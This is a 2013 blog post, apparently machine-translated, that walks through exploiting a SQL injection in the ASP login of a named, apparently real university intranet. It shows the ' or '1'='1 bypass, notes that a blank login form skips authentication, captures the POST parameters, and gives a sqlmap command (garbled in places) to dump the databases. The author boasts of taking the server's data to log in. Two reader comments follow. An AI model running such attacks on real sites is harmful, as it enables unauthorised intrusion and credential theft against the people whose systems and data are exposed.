Friday, May 31, 2013

[Sqlmap] SQL Injection using POST method






In this post short and simple, will detail the steps we will when we need to exploit a SQL Injection vulnerability, which are mostly based on some servers SQL Server and Oracle. These vulnerabilities are typical in LOGIN'S Administrative, because as we know, that when we enter the username and password this data is sent via the POST method, so there may be the possibility of entering false or some bypasses, this we can show an error that allows us to identify the vulnerability can be exploited so SqlMap running an automated using commands to send the request to POST and not GET as "usual".

If I did not explain well, for the few wise words! then no more bluntly, we take action!

We have an ASP LOGIN, which do not have the correct data or anything like that, since we have not found any vulnerability on a server that gives us this data, therefore we are curious and intelligent as we started testing false data and some bypasses as famosillo 'or '1' = '1 as shown in the following image:

Having placed this bypass, we are able to show us the server some vulnerability or bug allowing us to identify if you are vulnerable to SQL Injection, so much so that if the server is under ASP this can show us the error "Microsoft OLE DB Provider for ODBC Drivers error '80040e14 ' "if this happens, we are fortunate to be able to exploit this vulnerability. In this case after having affixed the bypass, the server returns the following error:


To view this vulnerability, we are aware that can be exploited manually or automatically process to obtain data that allows us logearnos the right way to the server.

Now, to continue testing if the login has some other type of vulnerability, back to the form and leave blank username and password and we click on Connect, which the server shows the following:


Anything weird right? Why? ... This LOGIN shows that requests are not validated, it means that if you put a bypass, this shows a vulnerability, as well as whether we leave the form blank and we click on connect, this allows us to skip the login. 

Well, after some small conclusions reached on the server has a vulnerability in the login and that requests are not validated, we will use the  Live HTTP Headers  in order to see the headwaters of the time cliqueemos login Connect.

In this case after placing the Live HTTP Headers  to listen to what happens on the server when we click on Connect leaving all white, this returns us to the following:


We have obtained three important data! which are:

  • http://www.uap.edu.pe/intranet/logon2.asp
  • POST / HTTP/1.1 intranet/logon2.asp
  • user = & pw = & user = 07 & B7 = + + Connect + +

The first is possibly the Vulnerable URL, the second indicates that the variable is POST and the last, the parameters that are possibly vulnerable.

Then proceed to exploit an automated vulnerability found in the LOGIN, using sqlmap and running the following command based on data collected by the Live HTTP Headers.

  • . / Sqlmap.py-u "http://www.uap.edu.pe/intranet/logon2.asp" - data = "user = & pw = & user = 07 & B7 = + + Connect + +"-p "user" - level = 5 - risk = 5 - dbs


After the tool has finished auditing the server, this will detect the POST parameter "user" is vulnerable, as is shown in the following image:


From there, we know that this is really vulnerable LOGIN and we have exploited thus obtaining full satisfaction throughout the server database.


Now if! with this DB will get the respective actual data successfully to the LOGIN logearnos we so desire ;)

I hope they can.

Greetings. 

2 comments:

Unknown said...

"SQL Injection" is subset of the an unverified/unsanitized user input vulnerability ("buffer overflows" are a different subset), and the idea is to convince the application to run SQL code that was not intended. If the application is creating SQL strings naively on the fly and then running them, it's straightforward to create some real surprises. http://born2hack.hpage.com/sql-injection-attack_58594237.html

SQL injection test site said...

Thanks for providing complete information on SQL injection. I found screenshots helpful.